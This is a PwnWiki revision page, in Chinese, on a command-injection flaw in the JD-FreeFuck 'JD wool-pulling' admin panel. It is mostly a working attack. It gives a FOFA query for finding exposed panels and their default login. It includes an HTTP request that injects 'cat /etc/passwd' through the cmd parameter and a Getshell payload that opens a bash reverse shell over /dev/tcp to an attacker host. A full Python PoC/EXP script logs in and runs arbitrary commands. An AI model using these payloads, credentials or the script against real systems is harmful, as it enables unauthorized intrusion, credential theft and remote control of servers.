Difference between revisions of "JD-FreeFuck 後台命令執行漏洞"

From PwnWiki
(Marked this version for translation)
(增加poc/exp 并且 删除了 原有的 ip)
Line 1: Line 1:
 
<languages  />
 
<languages  />
 
 
==FOFA==
 
==FOFA==
 
<pre>
 
<pre>
 
title="京东薅羊毛控制面板"
 
title="京东薅羊毛控制面板"
 
</pre>
 
</pre>
 
 
<translate>
 
<translate>
 
==默認帳號密碼== <!--T:1-->
 
==默認帳號密碼== <!--T:1-->
Line 12: Line 10:
 
useradmin/supermanito
 
useradmin/supermanito
 
</pre>
 
</pre>
 
 
<translate>
 
<translate>
 
==漏洞利用== <!--T:2-->
 
==漏洞利用== <!--T:2-->
 
</translate>
 
</translate>
 
 
<translate>
 
<translate>
 
<!--T:3-->
 
<!--T:3-->
 
發送如下請求包執行命令:
 
發送如下請求包執行命令:
 
</translate>
 
</translate>
 
 
<pre>
 
<pre>
 
POST /runCmd HTTP/1.1
 
POST /runCmd HTTP/1.1
Host: 101.200.189.251:5678
+
Host: XXX.XXX.XXX.XXX:5678
 
Content-Length: 50
 
Content-Length: 50
 
Pragma: no-cache
 
Pragma: no-cache
Line 39: Line 34:
 
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
 
cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500
 
</pre>
 
</pre>
 
 
<translate>
 
<translate>
 
<!--T:4-->
 
<!--T:4-->
 
其中 cmd 參數存在命令注入。
 
其中 cmd 參數存在命令注入。
 
</translate>
 
</translate>
 
 
==Getshell==
 
==Getshell==
 
<pre>
 
<pre>
Line 50: Line 43:
 
</pre>
 
</pre>
  
<translate>
+
== POC & EXP ==
 +
<blockquote>import requests
 +
 
 +
import json
 +
 
 +
def login(url,username="useradmin",password="supermanito"):
 +
 
 +
    loginReq = requests.Session()
 +
 
 +
    payload = {
 +
 
 +
            "username":username,
 +
 
 +
            "password":password
 +
 
 +
            }
 +
 
 +
    headers1 = {
 +
 
 +
        "Accept": "*/*",
 +
 
 +
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
 +
 
 +
        "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
 +
 
 +
        "Accept-Encoding": "gzip, deflate",
 +
 
 +
        "Accept-Language": "zh-CN,zh;q=0.9"
 +
 
 +
    }
 +
 
 +
    headers = {
 +
 
 +
        "Accept": "*/*",
 +
 
 +
        "X-Requested-With": "XMLHttpRequest",
 +
 
 +
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
 +
 
 +
        "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
 +
 
 +
        "Origin": url,
 +
 
 +
        "Referer": url,
 +
 
 +
        "Accept-Encoding": "gzip, deflate",
 +
 
 +
        "Accept-Language": "zh-CN,zh;q=0.9"
 +
 
 +
    }
 +
 
 +
    loginReq.get(url, headers=headers1)
 +
 
 +
    content = loginReq.post(url + "auth",data=payload,headers=headers)
 +
 
 +
    response = json.loads(content.text)
 +
 
 +
    # print(response["err"])
 +
 
 +
    # print(loginReq.cookies)
 +
 
 +
    if response["err"] == 0:
 +
 
 +
        print("login success")
 +
 
 +
        return(loginReq)
 +
 
 +
    else:
 +
 
 +
        print("login failure")
 +
 
 +
        raise RuntimeError("Can't login,beacuse -> "+response["msg"])
 +
 
 +
def exploit(url,session,command):
 +
 
 +
    <nowiki>'''</nowiki> POST form looks like
 +
 
 +
    POST /runCmd HTTP/1.1
 +
 
 +
    Host: XXX.XXX.XXX.XXXX:5678
 +
 
 +
    Content-Length: 51
 +
 
 +
    Accept: */*
 +
 
 +
    X-Requested-With: XMLHttpRequest
 +
 
 +
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
 +
 
 +
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 +
 
 +
    Accept-Encoding: gzip, deflate
 +
 
 +
    Accept-Language: zh-CN,zh;q=0.9
 +
 
 +
    Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc
 +
 
 +
    Connection: close
 +
 
 +
    cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000
 +
 
 +
    <nowiki>'''</nowiki>
 +
 
 +
    headers = {
 +
 
 +
        "Accept": "*/*",
 +
 
 +
        "X-Requested-With": "XMLHttpRequest",
 +
 
 +
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",
 +
 
 +
        "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",
 +
 
 +
        "Accept-Encoding": "gzip, deflate",
 +
 
 +
        "Accept-Language": "zh-CN,zh;q=0.9",
 +
 
 +
        "Connection": "close"
 +
 
 +
    }
 +
 
 +
    datas = {
 +
 
 +
        "cmd":"bash+jd.sh+bean_change;"+command+";",
 +
 
 +
        "delay":"1000"
 +
 
 +
    }
 +
 
 +
    session.get(url+"home",headers=headers)
 +
 
 +
    session.get(url+"run",headers=headers)
 +
 
 +
    session.get(url+"runCmd",headers=headers)
 +
 
 +
    response = session.post(url+"runCmd",data=datas,headers=headers)
 +
 
 +
    # print(session.cookies)
 +
 
 +
    objectResponse = json.loads(response.text)
 +
 
 +
    # print(objectResponse)
 +
 
 +
    if objectResponse["err"] == 0:
 +
 
 +
        print("execute success","\n")
 +
 
 +
        print("$ "+command)
 +
 
 +
        for line in objectResponse["msg"].split("\n")[1:-1]:
 +
 
 +
            print(line)
 +
 
 +
    else:
 +
 
 +
        print("execute failure")
 +
 
 +
        raise RuntimeError("Can't execute --> "+objectResponse["msg"])
 +
 
 +
url = "<nowiki>http://ip:port/</nowiki>"
 +
 
 +
exploit(url,login(url),"ifconfig")</blockquote><translate>
 
==參考== <!--T:5-->
 
==參考== <!--T:5-->
 
</translate>
 
</translate>
 +
  
 
https://www.secquan.org/Discuss/1071932#reply3
 
https://www.secquan.org/Discuss/1071932#reply3
  
 
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA
 
https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA

Revision as of 20:17, 1 April 2021

Other languages:
Chinese • ‎español • ‎português • ‎中文(繁體)‎

FOFA

title="京东薅羊毛控制面板"

默認帳號密碼

useradmin/supermanito

漏洞利用

發送如下請求包執行命令: 

POST /runCmd HTTP/1.1
Host: XXX.XXX.XXX.XXX:5678
Content-Length: 50
Pragma: no-cache
Cache-Control: no-cache
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cookie: connect.0.6356777726800276=s%3Av1W6DxlSqnPpVgvMCItxElFeKI1Psh4i.eE4ORs0Yz30N0TOg1pUVpOqrpIHyrqIimuXJVO8lE7U
Connection: close

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

其中 cmd 參數存在命令注入。

Getshell

cmd=bash+jd.sh+%3Bbash+-c+'exec+bash+-i+%26%3E%2Fdev%2Ftcp%2Fxxx.xxx.xxx.xxx%2F9999+%3C%261'%3B+now&delay=500

POC & EXP

import requests

import json

def login(url,username="useradmin",password="supermanito"):

    loginReq = requests.Session()

    payload = {

            "username":username,

            "password":password

            }

    headers1 = {

        "Accept": "*/*",

        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",

        "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",

        "Accept-Encoding": "gzip, deflate",

        "Accept-Language": "zh-CN,zh;q=0.9"

    }

    headers = {

        "Accept": "*/*",

        "X-Requested-With": "XMLHttpRequest",

        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",

        "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",

        "Origin": url,

        "Referer": url,

        "Accept-Encoding": "gzip, deflate",

        "Accept-Language": "zh-CN,zh;q=0.9"

    }

    loginReq.get(url, headers=headers1)

    content = loginReq.post(url + "auth",data=payload,headers=headers)

    response = json.loads(content.text)

    # print(response["err"])

    # print(loginReq.cookies)

    if response["err"] == 0:

        print("login success")

        return(loginReq)

    else:

        print("login failure")

        raise RuntimeError("Can't login,beacuse -> "+response["msg"])

def exploit(url,session,command):

    ''' POST form looks like

    POST /runCmd HTTP/1.1

    Host: XXX.XXX.XXX.XXXX:5678

    Content-Length: 51

    Accept: */*

    X-Requested-With: XMLHttpRequest

    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36

    Content-Type: application/x-www-form-urlencoded; charset=UTF-8

    Accept-Encoding: gzip, deflate

    Accept-Language: zh-CN,zh;q=0.9

    Cookie: connect.0.3349226518321824=s%3AWfJDGLRc0_vdAuXSWDOYku1qMSLXcZjv.vr52DLelVmWNvsY2q7SQCH%2B8KmDzT0ds2eRw7Fay0Sc

    Connection: close

    cmd=bash+jd.sh+bean_change%3Bifconfig%3B&delay=1000

    '''

    headers = {

        "Accept": "*/*",

        "X-Requested-With": "XMLHttpRequest",

        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36",

        "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8",

        "Accept-Encoding": "gzip, deflate",

        "Accept-Language": "zh-CN,zh;q=0.9",

        "Connection": "close"

    }

    datas = {

        "cmd":"bash+jd.sh+bean_change;"+command+";",

        "delay":"1000"

    }

    session.get(url+"home",headers=headers)

    session.get(url+"run",headers=headers)

    session.get(url+"runCmd",headers=headers)

    response = session.post(url+"runCmd",data=datas,headers=headers)

    # print(session.cookies)

    objectResponse = json.loads(response.text)

    # print(objectResponse)

    if objectResponse["err"] == 0:

        print("execute success","\n")

        print("$ "+command)

        for line in objectResponse["msg"].split("\n")[1:-1]:

            print(line)

    else:

        print("execute failure")

        raise RuntimeError("Can't execute --> "+objectResponse["msg"])

url = "http://ip:port/"

exploit(url,login(url),"ifconfig")

==參考==


https://www.secquan.org/Discuss/1071932#reply3

https://mp.weixin.qq.com/s/MEcuSnroUh6z3wp9Mi_OkA

Retrieved from "https://pwnwiki.com/index.php?title=JD-FreeFuck_後台命令執行漏洞&oldid=875"